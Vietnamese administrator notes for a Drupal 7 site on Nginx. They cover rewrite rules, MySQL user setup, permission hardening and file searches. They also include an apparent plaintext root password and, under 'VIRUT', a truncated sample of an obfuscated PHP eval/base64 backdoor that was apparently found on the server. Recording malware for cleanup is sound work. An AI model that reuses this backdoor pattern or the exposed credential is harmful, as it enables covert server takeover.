Cấu hình Drupal trong Nginx (Centmin)

CẤU HÌNH FILE CONFIG /usr/local/nginx/conf/conf.d/
------------------------------------------------------
# quang them loi khong hien thi anh
  location @rewrite {
    rewrite ^ /index.php last;
  }
  location ~* files/styles {
    access_log off;
    expires 30d;
    try_files $uri @rewrite;
  }
  location / {
    try_files $uri $uri/ /index.php?$args;
    include /usr/local/nginx/conf/503include-only.conf; 
    
TẠO TÀI KHOẢN MYSQL & THAY PASS
------------------------------------------------------
root\Nuce@123Nuce@123:
# Tạo một tài khoản user1 và cho phép truy cập tất cả các DB
CREATE USER 'user1'@'localhost' IDENTIFIED BY 'matkhau_user1';
GRANT ALL PRIVILEGES ON * . * TO 'user1'@'localhost';
FLUSH PRIVILEGES;

PHÂN QUYỀN CÁC THƯ MỤC TRONG DRUPAL 7
------------------------------------------------------
cd /home/nginx/domains/nuce.edu.vn/public
find . -type d -exec chmod 0555 {} \;
find . -type f -exec chmod 0444 {} \;
find sites/default/files -type d -exec chmod 0755 {} \;
find sites/default/files -type f -exec chmod 0644 {} \;
there should be no "tmp" directory at drupal root , place tmp outside where hackers can not access with weburl


TÌM MỘT FILE
------------------------------------------------------
find . -type f -name '*.php'
find /home/quangtv.nuce.edu.vn/public_html/ -type f -exec grep -l '#page-title' {} \;

VIRUT
------------------------------------------------------
<?php /*8968665*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT0$
